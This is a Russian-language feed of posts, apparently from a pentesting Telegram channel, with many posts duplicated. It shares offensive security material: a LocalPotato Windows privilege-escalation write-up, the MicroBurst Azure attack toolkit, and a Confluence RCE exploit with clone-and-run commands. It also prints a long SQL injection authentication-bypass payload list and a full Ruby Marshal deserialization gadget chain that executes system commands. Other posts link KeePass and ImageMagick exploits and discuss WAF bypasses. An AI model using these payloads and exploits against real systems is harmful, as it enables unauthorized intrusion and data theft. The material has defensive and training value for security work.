Похек
LocalPotato CVE-2023-21746 Windows LPE Еще одно повышение привилегий локальной Windows с помощью новой техники Potato ;) Атака LocalPotato - это тип атаки отражения NTLM, направленной на локальную аутентификацию. Эта атака позволяет произвольно читать/записывать…
Разбор уязвимости LocalPotato CVE-2023-21746 на русском языке!
LocalPotato CVE-2023-21746 Windows LPE
После обширного исследования мы пришли к "LocalPotato", не очень распространенной атаке отражения NTLM в локальной аутентификации, позволяющей произвольное чтение/запись файлов. Сочетание возможности произвольной записи в файл с выполнением кода позволило нам добиться повышения привилегий по всей цепочке от пользователя до SYSTEM.
В этой статье есть разбор эксплойта и то, как он был пропатчен. Данная статья представляет большой интерес для Red&Blue Team!
LocalPotato CVE-2023-21746 Windows LPE
После обширного исследования мы пришли к "LocalPotato", не очень распространенной атаке отражения NTLM в локальной аутентификации, позволяющей произвольное чтение/запись файлов. Сочетание возможности произвольной записи в файл с выполнением кода позволило нам добиться повышения привилегий по всей цепочке от пользователя до SYSTEM.
В этой статье есть разбор эксплойта и то, как он был пропатчен. Данная статья представляет большой интерес для Red&Blue Team!
Sergey Zybnev | Pentester
LocalPotato Windows LPE CVE-2023-21746
The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation
❤3
MicroBurst: A PowerShell Toolkit for Attacking Azure
MicroBurst включает функции и сценарии, поддерживающие обнаружение служб Azure, проверка на misconfiguration и post exploitation, такие как сброс учетных данных. Инструмент предназначен для использования во время тестов на проникновение, где используется Azure.
Импорт модуля:
Используйте следующую команду "Unblock-File" для рекурсивной проверки:
A Beginners Guide to Gathering Azure Passwords
Anonymously Enumerating Azure Services
Anonymously Enumerating Azure File Resources
Get-AzurePasswords: Exporting Azure RunAs Certificates for Persistence
Using Azure Automation Accounts to Access Key Vaults
Get-AzPasswords: Encrypting Automation Password Data
Azure Privilege Escalation Using Managed Identities
MicroBurst включает функции и сценарии, поддерживающие обнаружение служб Azure, проверка на misconfiguration и post exploitation, такие как сброс учетных данных. Инструмент предназначен для использования во время тестов на проникновение, где используется Azure.
Импорт модуля:
Import-Module .\MicroBurst.psm1Это позволит импортировать все применимые функции на основе установленных в настоящее время модулей в вашем окружении.
Используйте следующую команду "Unblock-File" для рекурсивной проверки:
dir -Recurse .\MicroBurst-master | Unblock-File
Дополнительный материал по пентесту Azure:A Beginners Guide to Gathering Azure Passwords
Anonymously Enumerating Azure Services
Anonymously Enumerating Azure File Resources
Get-AzurePasswords: Exporting Azure RunAs Certificates for Persistence
Using Azure Automation Accounts to Access Key Vaults
Get-AzPasswords: Encrypting Automation Password Data
Azure Privilege Escalation Using Managed Identities
🔥4👍1
Xakep - Очень плохая флешка.pdf
1.5 MB
Xakep - Очень плохая флешка. Разбираем атаку BadUSB в деталях
Об атаках BadUSB «Хакер» уже неоднократно писал. Сегодня мы разберем конкретный пример реализации такой атаки, подробно опишем устройство вредоносной флешки, приведем записанный на нее код и обсудим, как заставить пользователя Windows или Linux подключить ее к своему компьютеру.
#Xakep
Об атаках BadUSB «Хакер» уже неоднократно писал. Сегодня мы разберем конкретный пример реализации такой атаки, подробно опишем устройство вредоносной флешки, приведем записанный на нее код и обсудим, как заставить пользователя Windows или Linux подключить ее к своему компьютеру.
#Xakep
🔥7
CVE-2022-26134 Confluence Pre-Auth RCE via OGNL Injection
Confluence - это корпоративная вики на основе веб-технологий, разработанная австралийской компанией Atlassian. 02 июня 2022 года компания Atlassian выпустила совет по безопасности для своих приложений Confluence Server и Data Center, в котором говорится об уязвимости критической важности, связанной с неавторизованным удаленным выполнением кода. Уязвимость инъекции OGNL позволяет не аутентифицированному пользователю выполнить произвольный код на Confluence Server или Data Center.
Использование:
#CVE #POC
Confluence - это корпоративная вики на основе веб-технологий, разработанная австралийской компанией Atlassian. 02 июня 2022 года компания Atlassian выпустила совет по безопасности для своих приложений Confluence Server и Data Center, в котором говорится об уязвимости критической важности, связанной с неавторизованным удаленным выполнением кода. Уязвимость инъекции OGNL позволяет не аутентифицированному пользователю выполнить произвольный код на Confluence Server или Data Center.
Использование:
git clone https://github.com/whokilleddb/CVE-2022-26134-Confluence-RCE.git
python3 confluence-exploit.py -u https://confluence.app
Rooted!#CVE #POC
👍5
Похек
Photo
OSINT 14 февраля
44.688485,-63.6641767
41.303921,-81.901693
43.978734,15.384636
-20.937542, 164.658825
44.688485,-63.6641767
41.303921,-81.901693
43.978734,15.384636
-20.937542, 164.658825
🌚4👍3
🧠 Awesome ChatGPT Prompts
Добро пожаловать в репозиторий "Awesome ChatGPT Prompts"! Это коллекция примеров запросов для ChatGPT.
В этом репозитории вы найдете множество подсказок, которые можно использовать в ChatGPT. Мы призываем вас добавлять свои собственные подсказки в этот список, а также использовать ChatGPT для генерации новых команд. Для начала, просто клонируйте этот репозиторий и используйте подсказки из файла README.md в качестве исходных данных для ChatGPT. Вы также можете использовать запросы в этом файле как вдохновение для создания своих собственных.
Мы надеемся, что эти запросы окажутся полезными, и вам будет интересно использовать ChatGPT!
#ChatGPT
Добро пожаловать в репозиторий "Awesome ChatGPT Prompts"! Это коллекция примеров запросов для ChatGPT.
В этом репозитории вы найдете множество подсказок, которые можно использовать в ChatGPT. Мы призываем вас добавлять свои собственные подсказки в этот список, а также использовать ChatGPT для генерации новых команд. Для начала, просто клонируйте этот репозиторий и используйте подсказки из файла README.md в качестве исходных данных для ChatGPT. Вы также можете использовать запросы в этом файле как вдохновение для создания своих собственных.
Мы надеемся, что эти запросы окажутся полезными, и вам будет интересно использовать ChatGPT!
#ChatGPT
🔥4
CrackerJack
Веб интерфейс написанный на Python для Hashcat
Цель этого проекта - сохранить независимость графического интерфейса и Hashcat.
В двух словах, вот как это работает:
1. Пользователь загружает хэши, выбирает wordlist/правила/маску и т.д. и нажимает "Start".
2. Веб-сервер открывает новый screen.
3. Генерирует команду hashcat на основе настроек.
4. Запускает команду внутри screen.
5. Следит выводом screen, разбирает его и отображает в графическом интерфейсе.
Это позволяет CrackerJack быть перспективным, поскольку он упрощает работу с Hashcat.
#tools
Веб интерфейс написанный на Python для Hashcat
Цель этого проекта - сохранить независимость графического интерфейса и Hashcat.
В двух словах, вот как это работает:
1. Пользователь загружает хэши, выбирает wordlist/правила/маску и т.д. и нажимает "Start".
2. Веб-сервер открывает новый screen.
3. Генерирует команду hashcat на основе настроек.
4. Запускает команду внутри screen.
5. Следит выводом screen, разбирает его и отображает в графическом интерфейсе.
Это позволяет CrackerJack быть перспективным, поскольку он упрощает работу с Hashcat.
#tools
❤4
SQL injection auth bypass list
or 1=1#sqli
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
🐳6👍1💯1
Forwarded from Monkey Hacker
Ruby Insecure Deserialization
# RU
В Ruby также возможна иногда сделать RCE через десериализацию. В основном это возможно благодаря методу Marshall, который сериализует и десериализует объекты.
Снизу вы можете найти PoC
# EN
In Ruby, it is also possible to sometimes do RCE through deserialization. This is mostly possible through the Marshall method, which serializes and deserializes objects.
At the bottom you can find the PoC
# RU
Более подробно можно узнать здесь
# EN
Learn more here
# RU
Есть еще тулза
# EN
There is also a tool
# RU
В Ruby также возможна иногда сделать RCE через десериализацию. В основном это возможно благодаря методу Marshall, который сериализует и десериализует объекты.
Снизу вы можете найти PoC
# EN
In Ruby, it is also possible to sometimes do RCE through deserialization. This is mostly possible through the Marshall method, which serializes and deserializes objects.
At the bottom you can find the PoC
require 'base64'
Gem::SpecFetcher
Gem::Installer
module Gem
class Requirement
def marshal_dump
[@requirements]
end
end
end
wa1 = Net::WriteAdapter.new(Kernel, :system)
rs = Gem::RequestSet.allocate
rs.instance_variable_set('@sets', wa1)
rs.instance_variable_set('@git_set', "id")
wa2 = Net::WriteAdapter.new(rs, :resolve)
i = Gem::Package::TarReader::Entry.allocate
i.instance_variable_set('@read', 0)
i.instance_variable_set('@header', "aaa")
n = Net::BufferedIO.allocate
n.instance_variable_set('@io', i)
n.instance_variable_set('@debug_output', wa2)
t = Gem::Package::TarReader.allocate
t.instance_variable_set('@io', n)
r = Gem::Requirement.allocate
r.instance_variable_set('@requirements', t)
payload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r])
puts Base64.encode64(payload)# RU
Более подробно можно узнать здесь
# EN
Learn more here
https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.htmlhttps://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_ruby.htmlhttps://bishopfox.com/blog/ruby-vulnerabilities-exploits# RU
Есть еще тулза
# EN
There is also a tool
https://github.com/klezVirus/deser-ruby👍6
CVE-2023-24055 PoC KeePass 2.5x
Злоумышленник, имеющий доступ на запись к конфигурационному файлу KeePass, может изменить его и внедрить вредоносные триггеры, например, для получения паролей в открытом виде путем добавления триггера экспорта.
#CVE
Злоумышленник, имеющий доступ на запись к конфигурационному файлу KeePass, может изменить его и внедрить вредоносные триггеры, например, для получения паролей в открытом виде путем добавления триггера экспорта.
#CVE
😱3
💥CVE-2022-44268 ImageMagick Arbitrary Local File Read
💥CVE-2022-44268 ImageMagick Arbitrary File Read PoC
💥CVE-2022-44268 Arbitrary File Read PoC - PNG generator
💥Payload generator and extractor for CVE-2022-44268 written in Python
💥cve-2022-44268-detector - detect malicious PNGs
💥CVE-2022-44268 ImageMagick Arbitrary File Read PoC
💥CVE-2022-44268 Arbitrary File Read PoC - PNG generator
💥Payload generator and extractor for CVE-2022-44268 written in Python
💥cve-2022-44268-detector - detect malicious PNGs
by PrivateShizoGitHub
GitHub - y1nglamore/CVE-2022-44268-ImageMagick-Vulnerable-Docker-Environment: The vulnerable recurrence docker environment for…
The vulnerable recurrence docker environment for CVE-2022-44268 - y1nglamore/CVE-2022-44268-ImageMagick-Vulnerable-Docker-Environment
WAF глазами хакеров
Привет, Хабр! Сегодня мы поговорим об одном из современных механизмов защиты веб-приложений, а именно о WAF, Web Application Firewall. Мы расскажем, на чем основываются и как работают современные WAF, какие существуют способы обхода и bypass-техники, как их применять, а также почему ни в коем случае не стоит всецело полагаться на WAF. Мы представим свой взгляд пентестеров, которые никогда не принимали участие в разработке WAF и которые собирали информацию из открытых источников и на основе своего опыта, поэтому о некоторых тонкостях работы WAF мы можем даже и не подозревать.
#WAF
Привет, Хабр! Сегодня мы поговорим об одном из современных механизмов защиты веб-приложений, а именно о WAF, Web Application Firewall. Мы расскажем, на чем основываются и как работают современные WAF, какие существуют способы обхода и bypass-техники, как их применять, а также почему ни в коем случае не стоит всецело полагаться на WAF. Мы представим свой взгляд пентестеров, которые никогда не принимали участие в разработке WAF и которые собирали информацию из открытых источников и на основе своего опыта, поэтому о некоторых тонкостях работы WAF мы можем даже и не подозревать.
#WAF
Доброго времени суток. Объявление для любителей CTF. В команду RedHazzarTeam требуются игроки, владеющие навыками решения задач по направлениям rev/pwn/crypto. Молодая динамически развивающаяся команда, с амбициозными планами. Входим в топ-20 команд в РФ. Основной критерий: владение базовыми навыками по указанным направлениям, активное участие в жизни коллектива, большое желание развиваться в ИБ и помогать другим. По всем вопросам пишите в лс, буду рад пообщаться и ответить на Ваши вопросы.
(Контакт для связи: @Hazzarim139)
(Контакт для связи: @Hazzarim139)